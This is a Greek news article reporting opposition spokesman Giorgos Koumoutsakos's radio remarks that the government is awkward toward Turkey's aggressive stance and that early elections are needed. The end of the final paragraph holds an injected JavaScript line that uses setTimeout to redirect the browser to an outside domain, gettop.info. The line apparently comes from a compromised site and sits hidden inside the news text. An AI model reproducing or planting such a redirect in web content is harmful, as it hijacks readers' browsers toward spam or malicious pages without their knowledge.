Κουμουτσάκος: Αμήχανη η κυβέρνηση απέναντι στον επιθετικό εκνευρισμό της Τουρκίας

0
5

 

Ο νέος τομεάρχης Εξωτερικών της Νέας Δημοκρατίας, Γιώργος Κουμουτσάκος αναφέρθηκε στις προκλησεις της Τουρκίς σημει΄ψνοντας χαρακτηριστικά: «Εδώ και μήνες η Τουρκία του κ. Ερντογάν εκπέμπει έναν επιθετικό εκνευρισμό που δεν μπορούμε ούτε να τον αγνοήσουμε ούτε να τον υποτιμήσουμε ως γειτονική χώρα» και «η ελληνική κυβέρνηση δείχνει αμήχανη απέναντι σ’ αυτές τις εξελίξεις».

Μιλώντας στον ραδιοφωνικό σταθμό του Αθηναϊκού-Μακεδονικού Πρακτορείου Ειδήσεων «Πρακτορείο 104,9 FM», εξέφρασε την έντονη ανησυχία της αξιωματικής αντιπολίτευσης για την πορεία των εθνικών θεμάτων και τόνισε ότι «δεν μπορούμε ούτε να αγνοήσουμε ούτε να υποτιμήσουμε» τον επιθετικό αυτό εκνευρισμό της Άγκυρας και σημείωσε πως η κυβέρνηση δείχνει αμήχανη απέναντι σ’ αυτές τις εξελίξεις «κι αυτό φαίνεται από το πώς έχει χειριστεί την ενδεχόμενη, πιθανή, σχεδιαζόμενη, αναβληθείσα -ουδείς ξέρει- συνάντηση του κ. Τσίπρα με τον κ. Ερντογάν«.

«Ο κ. Ερντογάν αισθάνεται όσον αφορά την εσωτερική πολιτική σκηνή της Τουρκίας πανίσχυρος, όμως την ίδια ώρα φαίνεται ότι αισθάνεται ανήσυχος για τις εξελίξεις στα σύνορα του, εξελίξεις που και ο ίδιος αντιλαμβάνεται ότι δεν μπορεί να ελέγξει«, τόνισε ο κ. Κουμουτσάκος και πρόσθεσε: «Ο συνδυασμός αυτός ισχύος από τη μία πλευρά και μιας ανασφάλειας από την άλλη είναι ένας συνδυασμός που οδηγεί σε απρόβλεπτες αντιδράσεις και συμπεριφορές«.

Επιπλέον σημείωσε ότι «η χώρα χρειάζεται το ταχύτερο πολιτική αλλαγή. Και η πολιτική αλλαγή στις δημοκρατίες επιτυγχάνεται με εκλογές«.

«Στη χώρα συσσωρεύονται αδιέξοδα, λόγω της αδυναμίας, της ανικανότητας της κυβέρνησης να τα διαχειριστεί. Το ένα αδιέξοδο προστίθεται στο άλλο. Αντί να λύνονται προβλήματα, προστίθενται«, ανέφερε επισημαίνοντας πως σε μια τέτοια κατάσταση συσσωρευμένων αδιεξόδων, η μόνη λύση είναι η πολιτική αλλαγή.

«Όσο διατηρείται αυτή η κατάσταση των αδιεξόδων τόσο χειρότερο θα είναι για τη χώρα», σημείωσε ο κ. Κουμουτσάκος και πρόσθεσε: «η κυβέρνηση έχει κουράσει κι έχει κουραστεί. Επειδή η κυβέρνηση δεν μπορεί να τ’ αντιμετωπίσει αυτά (τα αδιέξοδα), εμείς μιλάμε για εκλογές. Δεν μπορούμε να τις επιβάλλουμε, αλλά δείχνουμε μ’ αυτή τη θέση μας τη σοβαρότητα των προκλήσεων που αντιμετωπίζει η χώρα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here